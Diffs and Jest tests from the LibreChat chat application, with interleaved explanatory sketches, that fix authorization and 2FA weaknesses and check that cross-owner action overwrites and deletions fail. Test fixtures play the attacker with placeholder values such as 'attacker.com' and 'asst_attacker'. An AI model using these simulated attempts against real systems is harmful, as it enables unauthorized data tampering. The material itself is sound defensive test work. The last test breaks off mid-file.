await mongoose.models.Action.create({
user: userId,
action_id: 'act_1',
agent_id: 'agent_A',
metadata: { domain: 'example.com' },
});
const result = await updateAction(
{ action_id: 'act_1', agent_id: 'agent_A' },
{ metadata: { domain: 'updated.com' } },
);
expect(result).not.toBeNull();
expect(result.metadata.domain).toBe('updated.com');
expect(result.agent_id).toBe('agent_A');
});
it('does not update when agent_id does not match (creates a new doc via upsert)', async () => {
await mongoose.models.Action.create({
user: userId,
action_id: 'act_1',
agent_id: 'agent_B',
metadata: { domain: 'victim.com', api_key: 'secret' },
});
const result = await updateAction(
{ action_id: 'act_1', agent_id: 'agent_A' },
{ user: userId, metadata: { domain: 'attacker.com' } },
);
expect(result.metadata.domain).toBe('attacker.com');
const original = await mongoose.models.Action.findOne({
action_id: 'act_1',
agent_id: 'agent_B',
}).lean();
expect(original).not.toBeNull();
expect(original.metadata.domain).toBe('victim.com');
expect(original.metadata.api_key).toBe('secret');
});
it('updates when action_id and assistant_id both match', async () => {
await mongoose.models.Action.create({
user: userId,
action_id: 'act_2',
assistant_id: 'asst_X',
metadata: { domain: 'example.com' },
});
const result = await updateAction(
{ action_id: 'act_2', assistant_id: 'asst_X' },
{ metadata: { domain: 'updated.com' } },
);
expect(result).not.toBeNull();
expect(result.metadata.domain).toBe('updated.com');
});
it('does not overwrite when assistant_id does not match', async () => {
await mongoose.models.Action.create({
user: userId,
action_id: 'act_2',
assistant_id: 'asst_victim',
metadata: { domain: 'victim.com', api_key: 'secret' },
});
await updateAction(
{ action_id: 'act_2', assistant_id: 'asst_attacker' },
{ user: userId, metadata: { domain: 'attacker.com' } },
);
const original = await mongoose.models.Action.findOne({
action_id: 'act_2',
assistant_id: 'asst_victim',
}).lean();
expect(original).not.toBeNull();
expect(original.metadata.domain).toBe('victim.com');
expect(original.metadata.api_key).toBe('secret');
});
});
describe('deleteAction', () => {
it('deletes when action_id and agent_id both match', async () => {
await mongoose.models.Action.create({
user: userId,
action_id: 'act_del',
agent_id: 'agent_A',
metadata: { domain: 'example.com' },
});
const result = await deleteAction({ action_id: 'act_del', agent_id: 'agent_A' });
expect(result).not.toBeNull();
expect(result.action_id).toBe('act_del');
const remaining = await mongoose.models.Action.countDocuments();
expect(remaining).toBe(0);
});
it('returns null and preserves the document when agent_id does not match', async () => {
await mongoose.models.Action.create({
user: userId,
action_id: 'act_del',
agent_id: 'agent_B',
metadata: { domain: 'victim.com' },
});
const result = await deleteAction({ action_id: 'act_del', agent_id: 'agent_A' });
expect(result).toBeNull();
const remaining = await mongoose.models.Action.countDocuments();
expect(remaining).toBe(1);
});
it('deletes when action_id and assistant_id both match', async () => {
await mongoose.models.Action.create({
user: userId,
action_id: 'act_del_asst',
assistant_id: 'asst_X',
metadata: { domain: 'example.com' },
});
const result = await deleteAction({ action_id: 'act_del_asst', assistant_id: 'asst_X' });
expect(result).not.toBeNull();
const remaining = await mongoose.models.Action.countDocuments();
expect(remaining).toBe(0);
});
it('returns null and preserves the document when assistant_id does not match', async () => {
await mongoose.models.Action.create({
user: userId,
action_id: 'act_del_asst',
assistant_id: 'asst_victim',
metadata: { domain: 'victim.com' },
});
const result = await deleteAction({
action_id: 'act_del_asst',
assistant_id: 'asst_attacker',
});
expect(result).toBeNull();
const remaining = await mongoose.models.Action.countDocuments();
expect(remaining).toBe(1);
});
});
describe('getActions (unscoped baseline)', () => {
it('returns actions by action_id regardless of agent_id', async () => {
await mongoose.models.Action.create({
user: userId,
action_id: 'act_shared',
agent_id: 'agent_B',
metadata: { domain: 'example.com' },
});
const results = await getActions({ action_id: 'act_shared' }, true);
expect(results).toHaveLength(1);
expect(results[0].agent_id).toBe('agent_B');
});
it('returns actions scoped by agent_id when provided', async () => {
await mongoose.models.Action.create({
user: userId,
action_id: 'act_scoped',
agent_id: 'agent_A',
metadata: { domain: 'a.com' },
});
await mongoose.models.Action.create({
user: userId,
action_id: 'act_other',
agent_id: 'agent_B',
metadata: { domain: 'b.com' },
});
const results = await getActions({ agent_id: 'agent_A' });
expect(results).toHaveLength(1);
expect(results[0].action_id).toBe('act_scoped');
});
});
describe('cross-type protection', () => {
it('updateAction with agent_id filter does not overwrite assistant-owned action', async () => {
await mongoose.models.Action.create({
user: userId,
action_id: 'act_cross',
assistant_id: 'asst_victim',
metadata: { domain: 'victim.com', api_key: 'secret' },
});
await updateAction(
{ action_id: 'act_cross', agent_id: 'agent_attacker' },
{ user: userId, metadata: { domain: 'evil.com' } },
);
const original = await mongoose.models.Action.findOne({
action_id: 'act_cross',
assistant_id: 'asst_victim',
}).lean();
expect(original).not.toBeNull();
expect(original.metadata.domain).toBe('victim.com');
expect(original.metadata.api_key).toBe('secret');
});
it('deleteAction with agent_id filter does not delete assistant-owned action', async () => {
await mongoose.models.Action.create({
user: userId,
action_id: 'act_cross_del',
assistant_id: 'asst_victim',
metadata: { domain: 'victim.com' },
});
const result = await deleteAction({ action_id: 'act_cross_del', agent_id: 'agent_attacker' });
expect(result).toBeNull();
const remaining = await mongoose.models.Action.countDocuments();
expect(remaining).toBe(1);
});
});
});
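The tests above pin down one invariant: mutation queries must match both `action_id` and the owning `agent_id`/`assistant_id`, so a caller supplying someone else's `action_id` cannot touch the original document. A minimal in-memory sketch of that semantics (names are illustrative; the real code uses Mongoose's `findOneAndDelete` against MongoDB):

```javascript
// In-memory stand-in for the Action collection.
const collection = [
  { action_id: 'act_1', agent_id: 'agent_B', metadata: { domain: 'victim.com' } },
];

// Mimics findOneAndDelete: every key in searchParams must match,
// otherwise nothing is deleted and null is returned.
function findOneAndDelete(searchParams) {
  const idx = collection.findIndex((doc) =>
    Object.entries(searchParams).every(([k, v]) => doc[k] === v),
  );
  if (idx === -1) {
    return null; // no document matched the full ownership-scoped filter
  }
  return collection.splice(idx, 1)[0];
}

// Wrong agent_id: the victim's document survives.
const miss = findOneAndDelete({ action_id: 'act_1', agent_id: 'agent_A' });
// Correct owner: the document is removed.
const hit = findOneAndDelete({ action_id: 'act_1', agent_id: 'agent_B' });
```

The same shape applies to `updateAction`: with an upsert, a mismatched filter creates a fresh document rather than overwriting the victim's, which is exactly what the "creates a new doc via upsert" test asserts.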


@@ -228,7 +228,7 @@ module.exports = {
         },
       ],
     };
-  } catch (err) {
+  } catch (_err) {
     logger.warn('[getConvosByCursor] Invalid cursor format, starting from beginning');
   }
   if (cursorFilter) {
@@ -361,6 +361,7 @@
     const deleteMessagesResult = await deleteMessages({
       conversationId: { $in: conversationIds },
+      user,
     });
     return { ...deleteConvoResult, messages: deleteMessagesResult };
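The added `user` key in the hunk above scopes message deletion to the requesting user. A sketch of why that matters, with an in-memory filter standing in for the MongoDB query (illustrative only):

```javascript
// Two users' messages sharing the same conversationId.
const messages = [
  { conversationId: 'c1', user: 'user123', text: 'mine' },
  { conversationId: 'c1', user: 'user456', text: 'not mine' },
];

// Mimics deleteMessages: without the `user` key, deleting a conversation
// by ID would also remove the other user's messages.
function deleteMessages(filter) {
  let deletedCount = 0;
  for (let i = messages.length - 1; i >= 0; i--) {
    const m = messages[i];
    const convoMatch = filter.conversationId.$in.includes(m.conversationId);
    const userMatch = filter.user === undefined || m.user === filter.user;
    if (convoMatch && userMatch) {
      messages.splice(i, 1);
      deletedCount++;
    }
  }
  return { deletedCount };
}

const result = deleteMessages({ conversationId: { $in: ['c1'] }, user: 'user123' });
```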


@@ -549,6 +549,7 @@ describe('Conversation Operations', () => {
       expect(result.messages.deletedCount).toBe(5);
       expect(deleteMessages).toHaveBeenCalledWith({
         conversationId: { $in: [mockConversationData.conversationId] },
+        user: 'user123',
       });
       // Verify conversation was deleted


@@ -152,12 +152,11 @@ describe('File Access Control', () => {
       expect(accessMap.get(fileIds[3])).toBe(false);
     });
 
-    it('should grant access to all files when user is the agent author', async () => {
+    it('should only grant author access to files attached to the agent', async () => {
       const authorId = new mongoose.Types.ObjectId();
       const agentId = uuidv4();
       const fileIds = [uuidv4(), uuidv4(), uuidv4()];
 
-      // Create author user
       await User.create({
         _id: authorId,
         email: 'author@example.com',
@@ -165,7 +164,6 @@ describe('File Access Control', () => {
         provider: 'local',
       });
 
-      // Create agent
       await createAgent({
         id: agentId,
         name: 'Test Agent',
@@ -174,12 +172,83 @@ describe('File Access Control', () => {
         provider: 'openai',
         tool_resources: {
           file_search: {
-            file_ids: [fileIds[0]], // Only one file attached
+            file_ids: [fileIds[0]],
+          },
+        },
+      });
+
+      const { hasAccessToFilesViaAgent } = require('~/server/services/Files/permissions');
+      const accessMap = await hasAccessToFilesViaAgent({
+        userId: authorId,
+        role: SystemRoles.USER,
+        fileIds,
+        agentId,
+      });
+
+      expect(accessMap.get(fileIds[0])).toBe(true);
+      expect(accessMap.get(fileIds[1])).toBe(false);
+      expect(accessMap.get(fileIds[2])).toBe(false);
+    });
+
+    it('should deny all access when agent has no tool_resources', async () => {
+      const authorId = new mongoose.Types.ObjectId();
+      const agentId = uuidv4();
+      const fileId = uuidv4();
+
+      await User.create({
+        _id: authorId,
+        email: 'author-no-resources@example.com',
+        emailVerified: true,
+        provider: 'local',
+      });
+
+      await createAgent({
+        id: agentId,
+        name: 'Bare Agent',
+        author: authorId,
+        model: 'gpt-4',
+        provider: 'openai',
+      });
+
+      const { hasAccessToFilesViaAgent } = require('~/server/services/Files/permissions');
+      const accessMap = await hasAccessToFilesViaAgent({
+        userId: authorId,
+        role: SystemRoles.USER,
+        fileIds: [fileId],
+        agentId,
+      });
+
+      expect(accessMap.get(fileId)).toBe(false);
+    });
+
+    it('should grant access to files across multiple resource types', async () => {
+      const authorId = new mongoose.Types.ObjectId();
+      const agentId = uuidv4();
+      const fileIds = [uuidv4(), uuidv4(), uuidv4()];
+
+      await User.create({
+        _id: authorId,
+        email: 'author-multi@example.com',
+        emailVerified: true,
+        provider: 'local',
+      });
+
+      await createAgent({
+        id: agentId,
+        name: 'Multi Resource Agent',
+        author: authorId,
+        model: 'gpt-4',
+        provider: 'openai',
+        tool_resources: {
+          file_search: {
+            file_ids: [fileIds[0]],
+          },
+          execute_code: {
+            file_ids: [fileIds[1]],
           },
         },
       });
 
-      // Check access as the author
       const { hasAccessToFilesViaAgent } = require('~/server/services/Files/permissions');
       const accessMap = await hasAccessToFilesViaAgent({
         userId: authorId,
@@ -188,10 +257,48 @@ describe('File Access Control', () => {
         agentId,
       });
 
-      // Author should have access to all files
       expect(accessMap.get(fileIds[0])).toBe(true);
       expect(accessMap.get(fileIds[1])).toBe(true);
-      expect(accessMap.get(fileIds[2])).toBe(true);
+      expect(accessMap.get(fileIds[2])).toBe(false);
+    });
+
+    it('should grant author access to attached files when isDelete is true', async () => {
+      const authorId = new mongoose.Types.ObjectId();
+      const agentId = uuidv4();
+      const attachedFileId = uuidv4();
+      const unattachedFileId = uuidv4();
+
+      await User.create({
+        _id: authorId,
+        email: 'author-delete@example.com',
+        emailVerified: true,
+        provider: 'local',
+      });
+
+      await createAgent({
+        id: agentId,
+        name: 'Delete Test Agent',
+        author: authorId,
+        model: 'gpt-4',
+        provider: 'openai',
+        tool_resources: {
+          file_search: {
+            file_ids: [attachedFileId],
+          },
+        },
+      });
+
+      const { hasAccessToFilesViaAgent } = require('~/server/services/Files/permissions');
+      const accessMap = await hasAccessToFilesViaAgent({
+        userId: authorId,
+        role: SystemRoles.USER,
+        fileIds: [attachedFileId, unattachedFileId],
+        agentId,
+        isDelete: true,
+      });
+
+      expect(accessMap.get(attachedFileId)).toBe(true);
+      expect(accessMap.get(unattachedFileId)).toBe(false);
     });
 
     it('should handle non-existent agent gracefully', async () => {
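The behavior change these tests lock in: even the agent's author only gets access to file IDs actually attached under `tool_resources`, across every resource type. A hedged sketch of that access-map rule (hypothetical helper, not LibreChat's `hasAccessToFilesViaAgent` implementation):

```javascript
// Collect every file ID attached to the agent across all resource types
// (file_search, execute_code, ...), then answer per requested file ID.
function buildAccessMap({ fileIds, agent }) {
  const attached = new Set();
  for (const resource of Object.values(agent.tool_resources ?? {})) {
    for (const id of resource.file_ids ?? []) {
      attached.add(id);
    }
  }
  // Unattached IDs map to false -- no blanket author access.
  return new Map(fileIds.map((id) => [id, attached.has(id)]));
}

const agent = {
  tool_resources: {
    file_search: { file_ids: ['f1'] },
    execute_code: { file_ids: ['f2'] },
  },
};
const accessMap = buildAccessMap({ fileIds: ['f1', 'f2', 'f3'], agent });
```

An agent with no `tool_resources` at all yields `false` for every file, matching the "deny all access" test.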


@@ -48,14 +48,14 @@ const loadAddedAgent = async ({ req, conversation, primaryAgent }) => {
     return null;
   }
 
-  // If there's an agent_id, load the existing agent
   if (conversation.agent_id && !isEphemeralAgentId(conversation.agent_id)) {
-    if (!getAgent) {
-      throw new Error('getAgent not initialized - call setGetAgent first');
+    let agent = req.resolvedAddedAgent;
+    if (!agent) {
+      if (!getAgent) {
+        throw new Error('getAgent not initialized - call setGetAgent first');
+      }
+      agent = await getAgent({ id: conversation.agent_id });
     }
-    const agent = await getAgent({
-      id: conversation.agent_id,
-    });
 
     if (!agent) {
       logger.warn(`[loadAddedAgent] Agent ${conversation.agent_id} not found`);


@@ -44,13 +44,14 @@
     "@google/genai": "^1.19.0",
     "@keyv/redis": "^4.3.3",
     "@langchain/core": "^0.3.80",
-    "@librechat/agents": "^3.1.55",
+    "@librechat/agents": "^3.1.56",
     "@librechat/api": "*",
     "@librechat/data-schemas": "*",
     "@microsoft/microsoft-graph-client": "^3.0.7",
     "@modelcontextprotocol/sdk": "^1.27.1",
     "@node-saml/passport-saml": "^5.1.0",
     "@smithy/node-http-handler": "^4.4.5",
+    "ai-tokenizer": "^1.0.6",
     "axios": "^1.13.5",
     "bcryptjs": "^2.4.3",
     "compression": "^1.8.1",
@@ -66,7 +67,7 @@
     "express-rate-limit": "^8.3.0",
     "express-session": "^1.18.2",
     "express-static-gzip": "^2.2.0",
-    "file-type": "^18.7.0",
+    "file-type": "^21.3.2",
     "firebase": "^11.0.2",
     "form-data": "^4.0.4",
     "handlebars": "^4.7.7",
@@ -106,10 +107,9 @@
     "pdfjs-dist": "^5.4.624",
     "rate-limit-redis": "^4.2.0",
     "sharp": "^0.33.5",
-    "tiktoken": "^1.0.15",
     "traverse": "^0.6.7",
     "ua-parser-js": "^1.0.36",
-    "undici": "^7.18.2",
+    "undici": "^7.24.1",
     "winston": "^3.11.0",
     "winston-daily-rotate-file": "^5.0.0",
     "xlsx": "https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz",


@@ -1,5 +1,6 @@
 const { encryptV3, logger } = require('@librechat/data-schemas');
 const {
+  verifyOTPOrBackupCode,
   generateBackupCodes,
   generateTOTPSecret,
   verifyBackupCode,
@@ -13,24 +14,42 @@ const safeAppTitle = (process.env.APP_TITLE || 'LibreChat').replace(/\s+/g, '');
 /**
  * Enable 2FA for the user by generating a new TOTP secret and backup codes.
  * The secret is encrypted and stored, and 2FA is marked as disabled until confirmed.
+ * If 2FA is already enabled, requires OTP or backup code verification to re-enroll.
  */
 const enable2FA = async (req, res) => {
   try {
     const userId = req.user.id;
+    const existingUser = await getUserById(
+      userId,
+      '+totpSecret +backupCodes _id twoFactorEnabled email',
+    );
+    if (existingUser && existingUser.twoFactorEnabled) {
+      const { token, backupCode } = req.body;
+      const result = await verifyOTPOrBackupCode({
+        user: existingUser,
+        token,
+        backupCode,
+        persistBackupUse: false,
+      });
+      if (!result.verified) {
+        const msg = result.message ?? 'TOTP token or backup code is required to re-enroll 2FA';
+        return res.status(result.status ?? 400).json({ message: msg });
+      }
+    }
     const secret = generateTOTPSecret();
     const { plainCodes, codeObjects } = await generateBackupCodes();
-    // Encrypt the secret with v3 encryption before saving.
     const encryptedSecret = encryptV3(secret);
-    // Update the user record: store the secret & backup codes and set twoFactorEnabled to false.
     const user = await updateUser(userId, {
-      totpSecret: encryptedSecret,
-      backupCodes: codeObjects,
-      twoFactorEnabled: false,
+      pendingTotpSecret: encryptedSecret,
+      pendingBackupCodes: codeObjects,
     });
-    const otpauthUrl = `otpauth://totp/${safeAppTitle}:${user.email}?secret=${secret}&issuer=${safeAppTitle}`;
+    const email = user.email || (existingUser && existingUser.email) || '';
+    const otpauthUrl = `otpauth://totp/${safeAppTitle}:${email}?secret=${secret}&issuer=${safeAppTitle}`;
 
     return res.status(200).json({ otpauthUrl, backupCodes: plainCodes });
   } catch (err) {
@@ -46,13 +65,14 @@ const verify2FA = async (req, res) => {
   try {
     const userId = req.user.id;
     const { token, backupCode } = req.body;
-    const user = await getUserById(userId, '_id totpSecret backupCodes');
+    const user = await getUserById(userId, '+totpSecret +pendingTotpSecret +backupCodes _id');
+    const secretSource = user?.pendingTotpSecret ?? user?.totpSecret;
 
-    if (!user || !user.totpSecret) {
+    if (!user || !secretSource) {
       return res.status(400).json({ message: '2FA not initiated' });
     }
 
-    const secret = await getTOTPSecret(user.totpSecret);
+    const secret = await getTOTPSecret(secretSource);
     let isVerified = false;
 
     if (token) {
@@ -78,15 +98,28 @@ const confirm2FA = async (req, res) => {
   try {
     const userId = req.user.id;
     const { token } = req.body;
-    const user = await getUserById(userId, '_id totpSecret');
+    const user = await getUserById(
+      userId,
+      '+totpSecret +pendingTotpSecret +pendingBackupCodes _id',
+    );
+    const secretSource = user?.pendingTotpSecret ?? user?.totpSecret;
 
-    if (!user || !user.totpSecret) {
+    if (!user || !secretSource) {
       return res.status(400).json({ message: '2FA not initiated' });
     }
 
-    const secret = await getTOTPSecret(user.totpSecret);
+    const secret = await getTOTPSecret(secretSource);
 
     if (await verifyTOTP(secret, token)) {
-      await updateUser(userId, { twoFactorEnabled: true });
+      const update = {
+        totpSecret: user.pendingTotpSecret ?? user.totpSecret,
+        twoFactorEnabled: true,
+        pendingTotpSecret: null,
+        pendingBackupCodes: [],
+      };
+      if (user.pendingBackupCodes?.length) {
+        update.backupCodes = user.pendingBackupCodes;
+      }
+      await updateUser(userId, update);
       return res.status(200).json();
     }
 
     return res.status(400).json({ message: 'Invalid token.' });
@@ -104,31 +137,27 @@ const disable2FA = async (req, res) => {
   try {
     const userId = req.user.id;
     const { token, backupCode } = req.body;
-    const user = await getUserById(userId, '_id totpSecret backupCodes');
+    const user = await getUserById(userId, '+totpSecret +backupCodes _id twoFactorEnabled');
 
     if (!user || !user.totpSecret) {
       return res.status(400).json({ message: '2FA is not setup for this user' });
     }
 
     if (user.twoFactorEnabled) {
-      const secret = await getTOTPSecret(user.totpSecret);
-      let isVerified = false;
-
-      if (token) {
-        isVerified = await verifyTOTP(secret, token);
-      } else if (backupCode) {
-        isVerified = await verifyBackupCode({ user, backupCode });
-      } else {
-        return res
-          .status(400)
-          .json({ message: 'Either token or backup code is required to disable 2FA' });
-      }
-      if (!isVerified) {
-        return res.status(401).json({ message: 'Invalid token or backup code' });
+      const result = await verifyOTPOrBackupCode({ user, token, backupCode });
+
+      if (!result.verified) {
+        const msg = result.message ?? 'Either token or backup code is required to disable 2FA';
+        return res.status(result.status ?? 400).json({ message: msg });
       }
     }
 
-    await updateUser(userId, { totpSecret: null, backupCodes: [], twoFactorEnabled: false });
+    await updateUser(userId, {
+      totpSecret: null,
+      backupCodes: [],
+      twoFactorEnabled: false,
+      pendingTotpSecret: null,
+      pendingBackupCodes: [],
+    });
     return res.status(200).json();
   } catch (err) {
     logger.error('[disable2FA]', err);
@@ -138,10 +167,28 @@ const disable2FA = async (req, res) => {
 /**
  * Regenerate backup codes for the user.
+ * Requires OTP or backup code verification if 2FA is already enabled.
  */
 const regenerateBackupCodes = async (req, res) => {
   try {
     const userId = req.user.id;
+    const user = await getUserById(userId, '+totpSecret +backupCodes _id twoFactorEnabled');
+    if (!user) {
+      return res.status(404).json({ message: 'User not found' });
+    }
+    if (user.twoFactorEnabled) {
+      const { token, backupCode } = req.body;
+      const result = await verifyOTPOrBackupCode({ user, token, backupCode });
+      if (!result.verified) {
+        const msg =
+          result.message ?? 'TOTP token or backup code is required to regenerate backup codes';
+        return res.status(result.status ?? 400).json({ message: msg });
+      }
+    }
     const { plainCodes, codeObjects } = await generateBackupCodes();
     await updateUser(userId, { backupCodes: codeObjects });
     return res.status(200).json({
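The diff above turns enrollment into a two-phase commit: `enable2FA` stages the new secret in pending fields, and only `confirm2FA` promotes it, so a failed or abandoned re-enrollment never clobbers a live secret. A plain-object sketch of that state transition (field names follow the diff; encryption and TOTP checks are elided):

```javascript
// Phase 1: stage the new secret without touching the live one.
function enable2FA(user, newSecret, newCodes) {
  return { ...user, pendingTotpSecret: newSecret, pendingBackupCodes: newCodes };
}

// Phase 2: on a verified token, promote pending fields and clear them.
function confirm2FA(user) {
  const update = {
    ...user,
    totpSecret: user.pendingTotpSecret ?? user.totpSecret,
    twoFactorEnabled: true,
    pendingTotpSecret: null,
    pendingBackupCodes: [],
  };
  if (user.pendingBackupCodes?.length) {
    update.backupCodes = user.pendingBackupCodes;
  }
  return update;
}

let user = { totpSecret: 'old', backupCodes: ['c1'], twoFactorEnabled: true };
user = enable2FA(user, 'new', ['n1', 'n2']);
const liveBeforeConfirm = user.totpSecret; // the live secret is untouched
user = confirm2FA(user);
```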


@@ -14,6 +14,7 @@ const {
   deleteMessages,
   deletePresets,
   deleteUserKey,
+  getUserById,
   deleteConvos,
   deleteFiles,
   updateUser,
@@ -34,6 +35,7 @@ const {
   User,
 } = require('~/db/models');
 const { updateUserPluginAuth, deleteUserPluginAuth } = require('~/server/services/PluginService');
+const { verifyOTPOrBackupCode } = require('~/server/services/twoFactorService');
 const { verifyEmail, resendVerificationEmail } = require('~/server/services/AuthService');
 const { getMCPManager, getFlowStateManager, getMCPServersRegistry } = require('~/config');
 const { invalidateCachedTools } = require('~/server/services/Config/getCachedTools');
@@ -241,6 +243,22 @@ const deleteUserController = async (req, res) => {
   const { user } = req;
 
   try {
+    const existingUser = await getUserById(
+      user.id,
+      '+totpSecret +backupCodes _id twoFactorEnabled',
+    );
+    if (existingUser && existingUser.twoFactorEnabled) {
+      const { token, backupCode } = req.body;
+      const result = await verifyOTPOrBackupCode({ user: existingUser, token, backupCode });
+      if (!result.verified) {
+        const msg =
+          result.message ??
+          'TOTP token or backup code is required to delete account with 2FA enabled';
+        return res.status(result.status ?? 400).json({ message: msg });
+      }
+    }
     await deleteMessages({ user: user.id }); // delete user messages
     await deleteAllUserSessions({ userId: user.id }); // delete user sessions
     await Transaction.deleteMany({ user: user.id }); // delete user transactions
@@ -352,6 +370,7 @@ const maybeUninstallOAuthMCP = async (userId, pluginKey, appConfig) => {
       serverConfig.oauth?.revocation_endpoint_auth_methods_supported ??
       clientMetadata.revocation_endpoint_auth_methods_supported;
     const oauthHeaders = serverConfig.oauth_headers ?? {};
+    const allowedDomains = getMCPServersRegistry().getAllowedDomains();
 
     if (tokens?.access_token) {
       try {
@@ -367,6 +386,7 @@ const maybeUninstallOAuthMCP = async (userId, pluginKey, appConfig) => {
             revocationEndpointAuthMethodsSupported,
           },
           oauthHeaders,
+          allowedDomains,
         );
       } catch (error) {
         logger.error(`Error revoking OAuth access token for ${serverName}:`, error);
@@ -387,6 +407,7 @@ const maybeUninstallOAuthMCP = async (userId, pluginKey, appConfig) => {
             revocationEndpointAuthMethodsSupported,
           },
           oauthHeaders,
+          allowedDomains,
         );
       } catch (error) {
         logger.error(`Error revoking OAuth refresh token for ${serverName}:`, error);
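The `allowedDomains` list threaded through the hunks above feeds the admin-trusted-domain exemption described in the commit messages, whose `isHostnameAllowed` tests cover exact, wildcard, and case-insensitive matching. A hedged sketch of a check with those behaviors (this mirrors the behaviors named in the tests, not LibreChat's actual implementation):

```javascript
// Returns true when the hostname matches an allowed entry:
// exact match, or a `*.` wildcard entry covering the base domain
// and its subdomains; comparison is case-insensitive.
function isHostnameAllowed(hostname, allowedDomains = []) {
  const host = hostname.toLowerCase();
  return allowedDomains.some((entry) => {
    const pattern = entry.toLowerCase();
    if (pattern.startsWith('*.')) {
      const base = pattern.slice(2);
      return host === base || host.endsWith(`.${base}`);
    }
    return host === pattern;
  });
}
```

With a check like this, SSRF validation can be skipped only for OAuth endpoints whose hostname an admin has explicitly listed, while everything else still goes through the guard.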


@@ -0,0 +1,264 @@
const mockGetUserById = jest.fn();
const mockUpdateUser = jest.fn();
const mockVerifyOTPOrBackupCode = jest.fn();
const mockGenerateTOTPSecret = jest.fn();
const mockGenerateBackupCodes = jest.fn();
const mockEncryptV3 = jest.fn();
jest.mock('@librechat/data-schemas', () => ({
encryptV3: (...args) => mockEncryptV3(...args),
logger: { error: jest.fn() },
}));
jest.mock('~/server/services/twoFactorService', () => ({
verifyOTPOrBackupCode: (...args) => mockVerifyOTPOrBackupCode(...args),
generateBackupCodes: (...args) => mockGenerateBackupCodes(...args),
generateTOTPSecret: (...args) => mockGenerateTOTPSecret(...args),
verifyBackupCode: jest.fn(),
getTOTPSecret: jest.fn(),
verifyTOTP: jest.fn(),
}));
jest.mock('~/models', () => ({
getUserById: (...args) => mockGetUserById(...args),
updateUser: (...args) => mockUpdateUser(...args),
}));
const { enable2FA, regenerateBackupCodes } = require('~/server/controllers/TwoFactorController');
function createRes() {
const res = {};
res.status = jest.fn().mockReturnValue(res);
res.json = jest.fn().mockReturnValue(res);
return res;
}
const PLAIN_CODES = ['code1', 'code2', 'code3'];
const CODE_OBJECTS = [
{ codeHash: 'h1', used: false, usedAt: null },
{ codeHash: 'h2', used: false, usedAt: null },
{ codeHash: 'h3', used: false, usedAt: null },
];
beforeEach(() => {
jest.clearAllMocks();
mockGenerateTOTPSecret.mockReturnValue('NEWSECRET');
mockGenerateBackupCodes.mockResolvedValue({ plainCodes: PLAIN_CODES, codeObjects: CODE_OBJECTS });
mockEncryptV3.mockReturnValue('encrypted-secret');
});
describe('enable2FA', () => {
it('allows first-time setup without token — writes to pending fields', async () => {
const req = { user: { id: 'user1' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue({ _id: 'user1', twoFactorEnabled: false, email: 'a@b.com' });
mockUpdateUser.mockResolvedValue({ email: 'a@b.com' });
await enable2FA(req, res);
expect(res.status).toHaveBeenCalledWith(200);
expect(res.json).toHaveBeenCalledWith(
expect.objectContaining({ otpauthUrl: expect.any(String), backupCodes: PLAIN_CODES }),
);
expect(mockVerifyOTPOrBackupCode).not.toHaveBeenCalled();
const updateCall = mockUpdateUser.mock.calls[0][1];
expect(updateCall).toHaveProperty('pendingTotpSecret', 'encrypted-secret');
expect(updateCall).toHaveProperty('pendingBackupCodes', CODE_OBJECTS);
expect(updateCall).not.toHaveProperty('twoFactorEnabled');
expect(updateCall).not.toHaveProperty('totpSecret');
expect(updateCall).not.toHaveProperty('backupCodes');
});
it('re-enrollment writes to pending fields, leaving live 2FA intact', async () => {
const req = { user: { id: 'user1' }, body: { token: '123456' } };
const res = createRes();
const existingUser = {
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
email: 'a@b.com',
};
mockGetUserById.mockResolvedValue(existingUser);
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
mockUpdateUser.mockResolvedValue({ email: 'a@b.com' });
await enable2FA(req, res);
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({
user: existingUser,
token: '123456',
backupCode: undefined,
persistBackupUse: false,
});
expect(res.status).toHaveBeenCalledWith(200);
const updateCall = mockUpdateUser.mock.calls[0][1];
expect(updateCall).toHaveProperty('pendingTotpSecret', 'encrypted-secret');
expect(updateCall).toHaveProperty('pendingBackupCodes', CODE_OBJECTS);
expect(updateCall).not.toHaveProperty('twoFactorEnabled');
expect(updateCall).not.toHaveProperty('totpSecret');
});
it('allows re-enrollment with valid backup code (persistBackupUse: false)', async () => {
const req = { user: { id: 'user1' }, body: { backupCode: 'backup123' } };
const res = createRes();
const existingUser = {
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
email: 'a@b.com',
};
mockGetUserById.mockResolvedValue(existingUser);
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
mockUpdateUser.mockResolvedValue({ email: 'a@b.com' });
await enable2FA(req, res);
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith(
expect.objectContaining({ persistBackupUse: false }),
);
expect(res.status).toHaveBeenCalledWith(200);
});
it('returns error when no token provided and 2FA is enabled', async () => {
const req = { user: { id: 'user1' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
});
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: false, status: 400 });
await enable2FA(req, res);
expect(res.status).toHaveBeenCalledWith(400);
expect(mockUpdateUser).not.toHaveBeenCalled();
});
it('returns 401 when invalid token provided and 2FA is enabled', async () => {
const req = { user: { id: 'user1' }, body: { token: 'wrong' } };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
});
mockVerifyOTPOrBackupCode.mockResolvedValue({
verified: false,
status: 401,
message: 'Invalid token or backup code',
});
await enable2FA(req, res);
expect(res.status).toHaveBeenCalledWith(401);
expect(res.json).toHaveBeenCalledWith({ message: 'Invalid token or backup code' });
expect(mockUpdateUser).not.toHaveBeenCalled();
});
});
describe('regenerateBackupCodes', () => {
it('returns 404 when user not found', async () => {
const req = { user: { id: 'user1' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue(null);
await regenerateBackupCodes(req, res);
expect(res.status).toHaveBeenCalledWith(404);
expect(res.json).toHaveBeenCalledWith({ message: 'User not found' });
});
it('requires OTP when 2FA is enabled', async () => {
const req = { user: { id: 'user1' }, body: { token: '123456' } };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
});
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
mockUpdateUser.mockResolvedValue({});
await regenerateBackupCodes(req, res);
